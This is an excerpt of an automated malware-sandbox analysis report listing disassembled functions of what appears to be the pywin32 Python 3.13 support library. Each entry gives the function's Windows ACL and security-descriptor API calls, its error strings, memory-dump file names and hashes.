Opcode Fuzzy Hash: c98c665ab8a0a4017fd0a264350303892bf8c1112e9847fedee4e5de0a27f4e9
Instruction Fuzzy Hash: 50510636A08B428AEA608F59E44016D73A8FF48FE4F544235EB4E87775DF3CE6558740

Function 00007FF8B7E83890 Relevance: 36.9, APIs: 14, Strings: 7, Instructions: 174COMMON

Download Yara Rule

APIs

PyErr_Format.PYTHON313 ref: 00007FF8B7E838DC
PyArg_ParseTuple.PYTHON313 ref: 00007FF8B7E83947
PyErr_SetString.PYTHON313 ref: 00007FF8B7E839B5
AddAuditAccessObjectAce.ADVAPI32 ref: 00007FF8B7E83A20
GetLastError.KERNEL32 ref: 00007FF8B7E83A2E
GetLengthSid.ADVAPI32 ref: 00007FF8B7E83A51
PyErr_Format.PYTHON313 ref: 00007FF8B7E83A81
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B7E83A8E
PyErr_Format.PYTHON313 ref: 00007FF8B7E83AB0
memset.VCRUNTIME140 ref: 00007FF8B7E83AC3
memcpy.VCRUNTIME140 ref: 00007FF8B7E83AD3
AddAuditAccessObjectAce.ADVAPI32 ref: 00007FF8B7E83B07
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B7E83B21
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B7E83B60

Strings

The object is not a PySID object, xrefs: 00007FF8B7E839AB
PyACL::AddAuditAccessObjectAce, xrefs: 00007FF8B7E83A70
AddAuditAccessObjectAce: unable to allocated %d bytes, xrefs: 00007FF8B7E83AA3
AddAuditAccessObjectAce not supported by this version of Windows, xrefs: 00007FF8B7E838D2
AddAuditAccessObjectAce, xrefs: 00007FF8B7E83A3D, 00007FF8B7E83B51
%s: adding ACE would put ACL over size limit, xrefs: 00007FF8B7E83A77
lllOOOii:AddAuditAccessObjectAce, xrefs: 00007FF8B7E83922

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Err_$Format$AccessAuditObjectfree$Arg_ErrorLastLengthParseStringTuplemallocmemcpymemset
String ID: %s: adding ACE would put ACL over size limit$AddAuditAccessObjectAce$AddAuditAccessObjectAce not supported by this version of Windows$AddAuditAccessObjectAce: unable to allocated %d bytes$PyACL::AddAuditAccessObjectAce$The object is not a PySID object$lllOOOii:AddAuditAccessObjectAce
API String ID: 282185603-1609464327
Opcode ID: 26eaf46bba8aa332da59d73b146c913fc64544bd534984a4cf7e3efad4388a83
Instruction ID: 6a912c3d8bc8235a50eb2ac0a83af89160f5952e62ba55bc3cb485935b59d8b6
Opcode Fuzzy Hash: 26eaf46bba8aa332da59d73b146c913fc64544bd534984a4cf7e3efad4388a83
Instruction Fuzzy Hash: 6381F822B19B4286EB50CBA9E8505AD73A5BF48FC4F444136EE4E47BA9DF3CE409C740

Function 00007FF8B7E83620 Relevance: 36.9, APIs: 14, Strings: 7, Instructions: 139COMMON

Download Yara Rule

APIs

PyErr_Format.PYTHON313 ref: 00007FF8B7E8364C
PyArg_ParseTuple.PYTHON313 ref: 00007FF8B7E836B5
PyErr_SetString.PYTHON313 ref: 00007FF8B7E836E2

Strings

The object is not a PySID object, xrefs: 00007FF8B7E836D8
AddAuditAccessAceEx not supported by this version of Windows, xrefs: 00007FF8B7E83642
AddAuditAccessAceEx, xrefs: 00007FF8B7E83758, 00007FF8B7E8386F
PyACL::AddAuditAccessAceEx, xrefs: 00007FF8B7E83787
AddAuditAccessAceEx: unable to allocated %d bytes, xrefs: 00007FF8B7E837BD
%s: adding ACE would put ACL over size limit, xrefs: 00007FF8B7E8378E
lllOii:AddAuditAccessAceEx, xrefs: 00007FF8B7E83699

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Err_$Arg_FormatParseStringTuple
String ID: %s: adding ACE would put ACL over size limit$AddAuditAccessAceEx$AddAuditAccessAceEx not supported by this version of Windows$AddAuditAccessAceEx: unable to allocated %d bytes$PyACL::AddAuditAccessAceEx$The object is not a PySID object$lllOii:AddAuditAccessAceEx
API String ID: 901859003-3541680958
Opcode ID: dd1c56f6490d01056c0aa620be259863251a6bb8c3dca21ebab00ade8506534f
Instruction ID: 4982fa0eb1dfac293f2dcf24ec2c7971edd095df349e416e5a38ccaa2d06a654
Opcode Fuzzy Hash: dd1c56f6490d01056c0aa620be259863251a6bb8c3dca21ebab00ade8506534f
Instruction Fuzzy Hash: 4261E926A08B4292EA60CB59E89026E73A5FF85FC4F544036EB4D87B75DF3DE549C700

Function 00007FF8B7E8B720 Relevance: 33.4, APIs: 13, Strings: 6, Instructions: 148COMMON

Download Yara Rule

APIs

PySequence_Tuple.PYTHON313(?,?,?,?,?,00007FF8B7E8B55E), ref: 00007FF8B7E8B75D
_Py_Dealloc.PYTHON313(?,?,?,?,?,00007FF8B7E8B55E), ref: 00007FF8B7E8B786
PyErr_Format.PYTHON313(?,?,?,?,?,00007FF8B7E8B55E), ref: 00007FF8B7E8B7A0
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00007FF8B7E8B55E), ref: 00007FF8B7E8B7D6
PyErr_Format.PYTHON313(?,?,?,?,?,00007FF8B7E8B55E), ref: 00007FF8B7E8B7F9
memset.VCRUNTIME140(?,?,?,?,?,00007FF8B7E8B55E), ref: 00007FF8B7E8B811
PyUnicode_AsWideCharString.PYTHON313 ref: 00007FF8B7E8B85E
PyErr_SetString.PYTHON313 ref: 00007FF8B7E8B881
PyMem_Free.PYTHON313 ref: 00007FF8B7E8B8A3
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B7E8B8B6
_Py_Dealloc.PYTHON313(?,?,?,?,?,00007FF8B7E8B55E), ref: 00007FF8B7E8B944

Strings

<NULL!!>, xrefs: 00007FF8B7E8B8F2
Sequence can contain at most %d items, xrefs: 00007FF8B7E8B793
Getting WCHAR string, xrefs: 00007FF8B7E8B877
Objects of type '%s' can not be converted to Unicode., xrefs: 00007FF8B7E8B900
None is not a valid string in this context, xrefs: 00007FF8B7E8B8D5
Unable to allocate %d bytes, xrefs: 00007FF8B7E8B7EC

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Err_$DeallocFormatString$CharFreeMem_Sequence_TupleUnicode_Widefreemallocmemset
String ID: <NULL!!>$Getting WCHAR string$None is not a valid string in this context$Objects of type '%s' can not be converted to Unicode.$Sequence can contain at most %d items$Unable to allocate %d bytes
API String ID: 1433913835-2102981847
Opcode ID: 8535e905c18311b126149db4c654d6e50bde341e448ca8767d7c62fbaddd82d7
Instruction ID: 7f084f0311a03f170b3e990d2c70e1ccd00ca5c7dbc0e1255378018d4b677a39
Opcode Fuzzy Hash: 8535e905c18311b126149db4c654d6e50bde341e448ca8767d7c62fbaddd82d7
Instruction Fuzzy Hash: B561CE32A08B4686EA508F9EE84417D77A0BF89FD4F894135EB4D47772EE3DE4498700

Function 00007FF8B7E83410 Relevance: 33.4, APIs: 13, Strings: 6, Instructions: 126COMMON

Download Yara Rule

APIs

PyArg_ParseTuple.PYTHON313 ref: 00007FF8B7E83456
PyErr_SetString.PYTHON313 ref: 00007FF8B7E83483
AddAuditAccessAce.ADVAPI32 ref: 00007FF8B7E834CB
GetLastError.KERNEL32 ref: 00007FF8B7E834D9
GetLengthSid.ADVAPI32 ref: 00007FF8B7E834F9
PyErr_Format.PYTHON313 ref: 00007FF8B7E83528
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B7E83538
PyErr_Format.PYTHON313 ref: 00007FF8B7E8355A
memset.VCRUNTIME140 ref: 00007FF8B7E8356D
memcpy.VCRUNTIME140 ref: 00007FF8B7E8357D
AddAuditAccessAce.ADVAPI32 ref: 00007FF8B7E835AE
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B7E835C8
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B7E83607

Strings

The object is not a PySID object, xrefs: 00007FF8B7E83479
PyACL::AddAuditAccessAce, xrefs: 00007FF8B7E83517
AddAuditAccessAce, xrefs: 00007FF8B7E834E8, 00007FF8B7E835F8
%s: adding ACE would put ACL over size limit, xrefs: 00007FF8B7E8351E
AddAuditAccessAce: unable to allocated %d bytes, xrefs: 00007FF8B7E8354D
llOii:AddAuditAccessAce, xrefs: 00007FF8B7E8343C

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Err_$AccessAuditFormatfree$Arg_ErrorLastLengthParseStringTuplemallocmemcpymemset
String ID: %s: adding ACE would put ACL over size limit$AddAuditAccessAce$AddAuditAccessAce: unable to allocated %d bytes$PyACL::AddAuditAccessAce$The object is not a PySID object$llOii:AddAuditAccessAce
API String ID: 3041754842-240227349
Opcode ID: 41c427efde199c7782ebfe022160a6b9792f91ee7cbc64d9b07f2f7f8afba0ed
Instruction ID: 6c0ed2fd41f0633af2a55fe8a9ccd16487e00eb87624c99a9aea20e8146c32ee
Opcode Fuzzy Hash: 41c427efde199c7782ebfe022160a6b9792f91ee7cbc64d9b07f2f7f8afba0ed
Instruction Fuzzy Hash: F3512922A08B4286EB50CF5AE84457D63A1BF84FC4F544035EB5E87BB5DE3CE9498740

Function 00007FF8B7E884D0 Relevance: 31.7, APIs: 14, Strings: 4, Instructions: 155COMMON

Download Yara Rule

APIs

PyArg_ParseTuple.PYTHON313 ref: 00007FF8B7E88507
PyErr_SetString.PYTHON313 ref: 00007FF8B7E88541
IsValidSid.ADVAPI32 ref: 00007FF8B7E88561

Part of subcall function 00007FF8B7E87A80: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B7E87AC5
Part of subcall function 00007FF8B7E87A80: PyErr_Format.PYTHON313 ref: 00007FF8B7E87AE8

GetSecurityDescriptorGroup.ADVAPI32 ref: 00007FF8B7E885AA
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B7E885BD
SetSecurityDescriptorGroup.ADVAPI32 ref: 00007FF8B7E885CD
GetSecurityDescriptorDacl.ADVAPI32 ref: 00007FF8B7E88628
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B7E88641
GetSecurityDescriptorSacl.ADVAPI32 ref: 00007FF8B7E88656
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B7E8866F
GetSecurityDescriptorOwner.ADVAPI32 ref: 00007FF8B7E88680
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B7E88693
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B7E8869C
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B7E886AF

Strings

The object is not a PySID object, xrefs: 00007FF8B7E88537
Oi:SetSecurityDescriptorOwner, xrefs: 00007FF8B7E88500
SetSecurityDescriptorGroup - invalid sid, xrefs: 00007FF8B7E8856D
SetSecurityDescriptorGroup, xrefs: 00007FF8B7E885D9

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: free$DescriptorSecurity$Err_Group$Arg_DaclFormatOwnerParseSaclStringTupleValidmalloc
String ID: Oi:SetSecurityDescriptorOwner$SetSecurityDescriptorGroup$SetSecurityDescriptorGroup - invalid sid$The object is not a PySID object
API String ID: 1524979833-2851344522
Opcode ID: c300119cf340fa15e331d90d47fc04b330e8a1bbcced3dc3e73c2575c99f7ea4
Instruction ID: 5abbeed767bf4630f6a6f06a0be74b21efec9d65fea3e92ef38cd1c98406efc3
Opcode Fuzzy Hash: c300119cf340fa15e331d90d47fc04b330e8a1bbcced3dc3e73c2575c99f7ea4
Instruction Fuzzy Hash: 40512A26B28B0295FB559FA9E8402BD23A4BF44FC8F884432EF0E566B5DE3CE445D340

Function 00007FF8B7E84770 Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 98COMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON313 ref: 00007FF8B7E84792
PyUnicode_AsWideCharString.PYTHON313 ref: 00007FF8B7E847D7
PyErr_SetString.PYTHON313 ref: 00007FF8B7E847F6

Strings

<NULL!!>, xrefs: 00007FF8B7E848E4
value is larger than a DWORD, xrefs: 00007FF8B7E84817
Attributes of PyDEVMODEW can't be deleted, xrefs: 00007FF8B7E84788
FormName must be a string of length %d or less, xrefs: 00007FF8B7E84842
Getting WCHAR string, xrefs: 00007FF8B7E847EC
Objects of type '%s' can not be converted to Unicode., xrefs: 00007FF8B7E848F2
None is not a valid string in this context, xrefs: 00007FF8B7E848C7

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: String$Err_$CharUnicode_Wide
String ID: <NULL!!>$Attributes of PyDEVMODEW can't be deleted$FormName must be a string of length %d or less$Getting WCHAR string$None is not a valid string in this context$Objects of type '%s' can not be converted to Unicode.$value is larger than a DWORD
API String ID: 3849944921-358745228
Opcode ID: bdc3e7128bf631bb1fbc859662b68c46382314d96899fc7225cfab469126a8c4
Instruction ID: be104e6d48d74c28ffa0ef059ae053fbd57cce149603394b0f5d3cd65201736a
Opcode Fuzzy Hash: bdc3e7128bf631bb1fbc859662b68c46382314d96899fc7225cfab469126a8c4
Instruction Fuzzy Hash: 8D41E566E18B4282EA508F9EE49017D2360FF89FD4F545132EB4E4B6B6DF3DE8858300

Function 00007FF8B7E84560 Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 98COMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON313 ref: 00007FF8B7E84582
PyUnicode_AsWideCharString.PYTHON313 ref: 00007FF8B7E845C7
PyErr_SetString.PYTHON313 ref: 00007FF8B7E845E6

Strings

<NULL!!>, xrefs: 00007FF8B7E846D5
value is larger than a DWORD, xrefs: 00007FF8B7E84607
Attributes of PyDEVMODEW can't be deleted, xrefs: 00007FF8B7E84578
Getting WCHAR string, xrefs: 00007FF8B7E845DC
Objects of type '%s' can not be converted to Unicode., xrefs: 00007FF8B7E846E3
None is not a valid string in this context, xrefs: 00007FF8B7E846B8
DeviceName must be a string of length %d or less, xrefs: 00007FF8B7E84632

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: String$Err_$CharUnicode_Wide
String ID: <NULL!!>$Attributes of PyDEVMODEW can't be deleted$DeviceName must be a string of length %d or less$Getting WCHAR string$None is not a valid string in this context$Objects of type '%s' can not be converted to Unicode.$value is larger than a DWORD
API String ID: 3849944921-3701856451
Opcode ID: 1339cf3604d15a9370892e0da6ac1f78a1d8c00d4b1d96f8de384227f0a6a403
Instruction ID: 05ece6ef85dff88c44ac98607e9cf9969cc3e1004d447bf4cf7aba0afdcb4ec2
Opcode Fuzzy Hash: 1339cf3604d15a9370892e0da6ac1f78a1d8c00d4b1d96f8de384227f0a6a403
Instruction Fuzzy Hash: 4B41F762E08B4282EA509F9EE89027D6361FF89FD4F545132EB5E476B6DE3CE4858300

Function 00007FF8B7E85ED0 Relevance: 31.6, APIs: 13, Strings: 5, Instructions: 96COMMON

Download Yara Rule

APIs

PyUnicode_AsWideCharString.PYTHON313 ref: 00007FF8B7E85F22
PyErr_SetString.PYTHON313 ref: 00007FF8B7E85F56
PyMem_Free.PYTHON313 ref: 00007FF8B7E85F6A
PyErr_Clear.PYTHON313 ref: 00007FF8B7E86037
PyErr_SetString.PYTHON313 ref: 00007FF8B7E8604E

Strings

<NULL!!>, xrefs: 00007FF8B7E86019
value is larger than a DWORD, xrefs: 00007FF8B7E85F4C
Only strings and iids can be converted to a CLSID., xrefs: 00007FF8B7E86044
Objects of type '%s' can not be converted to Unicode., xrefs: 00007FF8B7E86027
None is not a valid string in this context, xrefs: 00007FF8B7E85FFC

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Err_String$CharClearFreeMem_Unicode_Wide
String ID: <NULL!!>$None is not a valid string in this context$Objects of type '%s' can not be converted to Unicode.$Only strings and iids can be converted to a CLSID.$value is larger than a DWORD
API String ID: 443722841-2914159855
Opcode ID: 37b0708b124ef805f6eafb4413cb45e7aa50632965b2a1696fc48efc4bb87208
Instruction ID: 715b6344bd1240b80d30a0c3d2d2ffbc1289d258ef974414d8984fe18dd55bd0
Opcode Fuzzy Hash: 37b0708b124ef805f6eafb4413cb45e7aa50632965b2a1696fc48efc4bb87208
Instruction Fuzzy Hash: BA410666A08B4282FB108B9DE45427D63A1BF88FD8F884131EB5E477B6EF7CE4458301

Function 00007FF8B7E8C620 Relevance: 29.9, APIs: 13, Strings: 4, Instructions: 155windowCOMMON

Download Yara Rule

APIs

FormatMessageW.KERNEL32 ref: 00007FF8B7E8C667
wsprintfW.USER32 ref: 00007FF8B7E8C6B9
PyUnicode_FromWideChar.PYTHON313 ref: 00007FF8B7E8C6DE
Py_BuildValue.PYTHON313 ref: 00007FF8B7E8C6F8
PyErr_SetObject.PYTHON313 ref: 00007FF8B7E8C70B
_Py_Dealloc.PYTHON313 ref: 00007FF8B7E8C723
PyArg_ParseTuple.PYTHON313 ref: 00007FF8B7E8C776
PyErr_SetString.PYTHON313 ref: 00007FF8B7E8C7B8
PyObject_GetBuffer.PYTHON313 ref: 00007FF8B7E8C7D1
PyBuffer_Release.PYTHON313 ref: 00007FF8B7E8C7F4
PyErr_Format.PYTHON313 ref: 00007FF8B7E8C80E
PyUnicode_FromWideChar.PYTHON313 ref: 00007FF8B7E8C84A
PyBuffer_Release.PYTHON313 ref: 00007FF8B7E8C86B

Strings

iNzz, xrefs: 00007FF8B7E8C6EF
COM Error 0x%x, xrefs: 00007FF8B7E8C6AD
Buffer cannot be None, xrefs: 00007FF8B7E8C7AE
Buffer length can be at most %d characters, xrefs: 00007FF8B7E8C801

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Err_$Buffer_CharFormatFromReleaseUnicode_Wide$Arg_BufferBuildDeallocMessageObjectObject_ParseStringTupleValuewsprintf
String ID: Buffer cannot be None$Buffer length can be at most %d characters$COM Error 0x%x$iNzz
API String ID: 2036073046-2401320735
Opcode ID: 4fed1c0e6664d21868abd63e6797ee29565fbc786b664ad84a8487749ffcb9f1
Instruction ID: 7db14598dbca1b8fff7f84758fe4ef632cd145a80412b05721406d1bfa46cb07
Opcode Fuzzy Hash: 4fed1c0e6664d21868abd63e6797ee29565fbc786b664ad84a8487749ffcb9f1
Instruction Fuzzy Hash: 48612B22A08B4286EB608B69E85427D63A0FF89FD4F985135EB4E476F6DF3CE4458700

Function 00007FF8B7E88070 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 141COMMON

Download Yara Rule

APIs

PyArg_ParseTuple.PYTHON313 ref: 00007FF8B7E880AC
PyErr_SetString.PYTHON313 ref: 00007FF8B7E880E6
GetSecurityDescriptorSacl.ADVAPI32 ref: 00007FF8B7E8812A
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B7E88142
SetSecurityDescriptorSacl.ADVAPI32 ref: 00007FF8B7E88155
GetSecurityDescriptorOwner.ADVAPI32 ref: 00007FF8B7E881A8
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B7E881BB
GetSecurityDescriptorGroup.ADVAPI32 ref: 00007FF8B7E881CC
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B7E881DF
GetSecurityDescriptorDacl.ADVAPI32 ref: 00007FF8B7E881F4
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B7E8820D
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B7E88216
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B7E8822C

Part of subcall function 00007FF8B7E87950: IsValidSecurityDescriptor.ADVAPI32(?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E87960
Part of subcall function 00007FF8B7E87950: PyErr_SetString.PYTHON313(?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8797B

Part of subcall function 00007FF8B7E87D20: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF8B7E81931), ref: 00007FF8B7E87D3B
Part of subcall function 00007FF8B7E87D20: GetSecurityDescriptorLength.ADVAPI32(?,?,?,00007FF8B7E81931), ref: 00007FF8B7E87D44

Strings

The object is not a PyACL object, xrefs: 00007FF8B7E880DC
iOi:SetSacl, xrefs: 00007FF8B7E880A3
SetSecurityDescriptorSacl, xrefs: 00007FF8B7E88161

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: DescriptorSecurityfree$Err_SaclString$Arg_DaclGroupLengthOwnerParseTupleValid
String ID: SetSecurityDescriptorSacl$The object is not a PyACL object$iOi:SetSacl
API String ID: 1467358711-1973599164
Opcode ID: ca031ff84b3ac6ab0230af49dea1aa47d77822ddcdcf60e7dd2b298a8373459c
Instruction ID: 01ae103830729fed8972196ae649830377c9be012fee370fc320ac013c179fd3
Opcode Fuzzy Hash: ca031ff84b3ac6ab0230af49dea1aa47d77822ddcdcf60e7dd2b298a8373459c
Instruction Fuzzy Hash: F4511726B28B5295FB519FA9D8405BD23A1BF44FC8F884432EF0E66A65DF3CE549C300

Function 00007FF8B7E882F0 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 138COMMON

Download Yara Rule

APIs

PyArg_ParseTuple.PYTHON313 ref: 00007FF8B7E8831C
PyErr_SetString.PYTHON313 ref: 00007FF8B7E88356
GetSecurityDescriptorOwner.ADVAPI32 ref: 00007FF8B7E883A2
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B7E883B5
SetSecurityDescriptorOwner.ADVAPI32 ref: 00007FF8B7E883C5
GetSecurityDescriptorDacl.ADVAPI32 ref: 00007FF8B7E88420
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B7E88439
GetSecurityDescriptorSacl.ADVAPI32 ref: 00007FF8B7E8844E
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B7E88467
GetSecurityDescriptorGroup.ADVAPI32 ref: 00007FF8B7E88478
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B7E8848B
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B7E88494
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B7E884A7

Part of subcall function 00007FF8B7E87950: IsValidSecurityDescriptor.ADVAPI32(?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E87960
Part of subcall function 00007FF8B7E87950: PyErr_SetString.PYTHON313(?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8797B

Part of subcall function 00007FF8B7E87D20: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF8B7E81931), ref: 00007FF8B7E87D3B
Part of subcall function 00007FF8B7E87D20: GetSecurityDescriptorLength.ADVAPI32(?,?,?,00007FF8B7E81931), ref: 00007FF8B7E87D44

Strings

The object is not a PySID object, xrefs: 00007FF8B7E8834C
Oi:SetSecurityDescriptorOwner, xrefs: 00007FF8B7E8830E
SetSecurityDescriptorOwner, xrefs: 00007FF8B7E883D1

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
